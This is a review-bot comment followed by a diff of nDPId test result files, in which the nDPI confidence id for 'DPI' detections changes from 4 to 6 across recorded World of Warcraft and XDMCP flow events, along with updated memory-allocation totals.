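Review bot: The numeric key under `ndpi.confidence` changes from `"4"` to `"6"` for the `DPI` label on every changed line of this hunk. The same change appears in the whois and wow result files, while the unchanged `{"1":"Match by port"}` line keeps its key. That is a wire-visible change for anything that filters or scores events on the numeric id, and it presumably follows an enum change in the bumped libnDPI. The commit message only records the submodule bump, so I would add a line such as `confidence id for "DPI" changes from 4 to 6; match on the label, not the id` so that downstream rules are updated deliberately.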
@@ -7,30 +7,30 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437858769451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769451,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437858769452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769452,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437858769649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769649,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG6kgMgd41wKiyFABQmY301K7baPoTfqASFqCzawAAAgQFhAQCCAqn1+VGACnZUgEDAwc="} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437858769673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1437858769673,"pkt":"JGURQGHhJGUR0Ik6CABFAAAwGJRAAHEGSPkYaR0VwKiyFABQmZCXtfydBIffHXASIACqLAAAAgQFhAQCAAA="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": 
{"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858780584,"flow_last_seen":1437858780584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858780584,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437858780584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1437858780584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1437858780796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780796,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmaEZw7OGrM1zDqASOJCV8gAAAgQFhAQCCApCuV\/iACndrQEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858849489,"flow_last_seen":1437858849489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858849489,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437858849489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437858849489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437858849702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849702,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmcRkqiOyEV+yfKASOJAOpgAAAgQFhAQCCApCum0NACn4mAEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 
00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","packets-captured":83,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":4309,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1437859397750} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437859397750,"flow_last_seen":1437859397750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437859397750,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437859397750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1437859397750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1437859397966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397966,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+UMgeSYwKiyFA6Mmqlj7+ucr3YvkqASOJA2KQAAAgQFhAQCCApCwowWACrOwgEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-payload-len":4586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1437859398661} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 @@ -40,9 +40,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882827 bytes -~~ total memory freed........: 5882827 bytes -~~ total allocations/frees...: 118237/118237 +~~ total memory allocated....: 6016461 bytes +~~ total memory freed........: 6016461 bytes +~~ total allocations/frees...: 120999/120999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 797 chars diff --git a/test/results/xdmcp.pcap.out b/test/results/xdmcp.pcap.out index 866c413b0..a8020518f 100644 
--- a/test/results/xdmcp.pcap.out +++ b/test/results/xdmcp.pcap.out 
@@ -2,10 +2,10 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1538467333581} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1538467333581,"flow_last_seen":1538467333581,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1538467333581,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1538467333581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":15,"thread_ts_msec":1538467333581,"pkt":"CAAngNsFUlQAEjUACABFAAAjIEIAAP8Rg4AKAQICCgECBO\/yALEAD\/cgAAEAAgABAAAAAAAAAAAAAAAA"} 
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"xdmcp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1538467333581,"flow_last_seen":1538467333581,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1538467333581,"l3_proto":"ip4","src_ip":"10.1.2.2","dst_ip":"10.1.2.4","src_port":61426,"dst_port":177,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"XDMCP","breed":"Acceptable","category":"RemoteAccess"}} 